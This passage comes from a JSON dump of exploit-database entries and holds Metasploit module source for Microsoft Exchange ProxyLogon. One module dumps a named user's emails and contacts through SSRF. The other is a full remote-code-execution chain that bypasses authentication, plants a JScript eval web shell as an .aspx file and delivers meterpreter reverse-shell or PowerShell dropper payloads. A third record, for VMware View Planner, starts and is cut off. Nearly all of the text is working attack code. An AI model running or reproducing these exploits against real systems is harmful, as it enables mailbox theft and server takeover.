Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\n ['URL', 'http://aka.ms/exchangevulns']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => 
true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def grab_contacts\n response = send_xml(soap_findcontacts)\n xml = Nokogiri::XML.parse(response.body)\n\n data = xml.xpath('//t:Contact', XMLNS)\n if data.empty?\n print_status(' - the user has no contacts')\n else\n write_loot(data.to_s)\n end\n end\n\n def grab_emails(total_count)\n # get the emails list of the target folder.\n response = send_xml(soap_maillist(total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n # iteration to download the emails.\n xml.xpath('//t:ItemId', XMLNS).each do |item|\n print_status(\" - download item: #{item.values[1]}\")\n response = send_xml(soap_download(item.values[0], item.values[1]))\n xml = Nokogiri::XML.parse(response.body)\n\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\n write_loot(Rex::Text.decode_base64(message))\n end\n end\n\n def send_xml(data)\n uri = normalize_uri('ecp', 'temp.js')\n\n received = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => data\n )\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_download(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n 
xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_findcontacts\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='contacts'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_mailnum\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n 
</t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_maillist(max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(data)\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\n print_good(\" - file saved to #{loot_path}\")\n end\n\n def run\n # get the informations about the targeted user account.\n response = send_xml(soap_mailnum)\n if response.body =~ /Success/\n print_status('Connection to the server is successful')\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\n\n # grab contacts.\n print_status('Attempt to dump contacts list for this user')\n grab_contacts\n\n print_line\n\n # grab emails.\n print_status('Attempt to dump emails for this user')\n xml = Nokogiri::XML.parse(response.body)\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\n\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\n print_status(\" - number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\" - number of email recaluled due to max 
entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n grab_emails(total_count)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T08:02:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 Versions less than 15.00.1497.012, Exchange 2016 CU18 less than 15.01.2106.013, Exchange 2016 CU19 less than 15.01.2176.009, Exchange 2019 CU7 less than 15.02.0721.013, and Exchange 2019 CU8 less than 15.02.0792.010. All components are vulnerable by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyLogon Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36024", "href": "https://0day.today/exploit/description/36024", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 
'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 
'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n 
Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 
2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? 
|| server.empty?\n\n [server, legacy_dn]\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r 
at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Prepare the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the 
payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Write the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning(\"Wait a lot (#{i})\")\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? 
|| oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = 
\"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[email\u00a0protected]#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 
'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T21:20:59", "description": "This Metasploit module exploits an unauthenticated log file upload within the log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 Security Patch 1. 
Successful exploitation will result in remote code execution as the apache user inside the appacheServer Docker container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T00:00:00", "type": "zdt", "title": "VMware View Planner 4.6 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": 